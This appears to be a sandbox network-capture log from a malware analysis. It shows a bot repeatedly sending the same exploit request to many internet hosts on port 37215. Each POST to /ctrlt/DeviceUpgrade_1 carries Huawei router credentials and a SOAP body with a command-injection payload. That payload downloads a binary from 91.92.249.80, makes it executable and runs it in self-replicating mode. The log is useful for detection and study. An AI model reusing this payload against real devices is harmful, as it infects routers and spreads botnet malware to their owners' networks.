                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2494192.168.2.235449641.212.83.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712209940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2495192.168.2.2341042157.179.238.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712243080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2496192.168.2.236099072.183.134.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712258101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2497192.168.2.2341020197.207.73.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713308096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2498192.168.2.2351856157.61.105.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713340044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2499192.168.2.2337776157.22.188.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713366032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2500192.168.2.235666641.66.208.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713419914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2501192.168.2.234755859.27.137.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713423967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2502192.168.2.2338726197.215.99.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713484049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2503192.168.2.2358824197.1.181.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713510036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2504192.168.2.234621840.235.204.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713527918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
